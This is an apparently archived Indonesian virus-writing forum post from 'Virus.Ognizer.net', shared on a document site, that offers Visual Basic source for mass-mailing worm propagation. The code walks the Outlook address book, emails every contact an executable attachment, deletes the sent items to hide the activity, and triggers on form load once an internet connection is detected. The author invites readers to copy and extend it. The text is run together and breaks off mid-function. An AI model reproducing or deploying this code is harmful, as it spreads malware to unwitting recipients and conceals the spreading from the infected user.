• Embed Doc
  • Readcast
  • Collections
  • CommentGo Back
Download
 
Virus.Ognizer.net The Online Virus CommunityCopyright © Virus.Ognizer.net. All rights reserved.Documentation Vxer Center Http://Virus29a.blogspot.com
1
Metode penyebaran lewat email (VB)
bagus_badboy
Posted: Sun Dec 10, 2006 2:52 amPost subject: Metode penyebaran lewat emailOutlook Express VB1. Kembangkan sendiri sourcecodeX.2. Klo males ketik, copy aja or open langsung Project1.3. Semoga bermanfaat.4. Klo ada saran or tambahan apa aja kirimin aja ke (bagus_badboy@hotmail.com).5. PlusMinusX mohon maaf yach.Form :
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''FunctionOutlook()On Error Resume NextSetOutlookApp = CreateObject("Outlook.Application")IfOutlookApp = "Outlook"ThenSetMapi = OutlookApp.GetNameSpace("MAPI")SetMapiAdList = Mapi.AddressListsFor EachAddressInMapiAdList If Address.AddressEntries.Count <> 0Then NumOfContacts = Address.AddressEntries.CountForContactNumber = 1ToNumOfContacts SetEmailItem = OutlookApp.CreateItem(0)SetContactNumber = Address.AddressEntries(ContactNumber)EmailItem.To = ContactNumber.AddressEmailItem.Subject = "Percobaan, ;o)"EmailItem.Body = "Percobaan"Set EmailAttachment = EmailItem.AttachmentsEmailAttachment.Add = GetSpecialfolder(&H5) & "Percobaan.exe"EmailItem.DeleteAfterSubmit =TrueIfEmailItem.To <> ""ThenEmailItem.Send
 
Virus.Ognizer.net The Online Virus CommunityCopyright © Virus.Ognizer.net. All rights reserved.Documentation Vxer Center Http://Virus29a.blogspot.com
2
End IfNextEnd IfNextEnd IfEnd Function'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''Private SubForm_Load()On Error Resume NextIfSecond(Now)Mod30 = 0Then IfInternetCheckConnection("http://www.yahoo.com/",FLAG_ICC_FORCE_CONNECTION, 0&) <> 0 OrInternetCheckConnection("http://www.google.com/",FLAG_ICC_FORCE_CONNECTION, 0&) <> 0ThenCallOutlookEnd IfEnd IfEnd Sub'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''Module:Public Declare FunctionShellAboutLib"shell32.dll"Alias  "ShellAboutA" (ByValhWndAs Long,ByValszAppAs String,ByVal  szOtherStuffAs String,ByValhIconAs Long)As Long Public Declare FunctionSHGetSpecialFolderLocationLib"shell32.dll" (ByValhwndOwnerAs Long,ByValnFolderAs Long, pidlAsITEMIDLIST)As Long Public Declare FunctionSHGetPathFromIDListLib"shell32.dll"Alias  "SHGetPathFromIDListA" (ByValpidlAs Long,ByValpszPathAs String)As Long Public Declare FunctionInternetCheckConnectionLib"wininet.dll"Alias  "InternetCheckConnectionA" (ByVallpszUrlAs String,ByValdwFlagsAs Long,ByValdwReservedAs Long)As Long  Public TypeSHITEMIDcbAs Long abIDAs ByteEnd TypePublic TypeITEMIDLISTmkidAsSHITEMIDEnd TypePublic Const FLAG_ICC_FORCE_CONNECTION = &H1'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''Public FunctionGetSpecialfolder(CSIDLAs Long)As String On Error Resume Next
of 00

Leave a Comment

You must be to leave a comment.
Submit
Characters: ...
You must be to leave a comment.
Submit
Characters: ...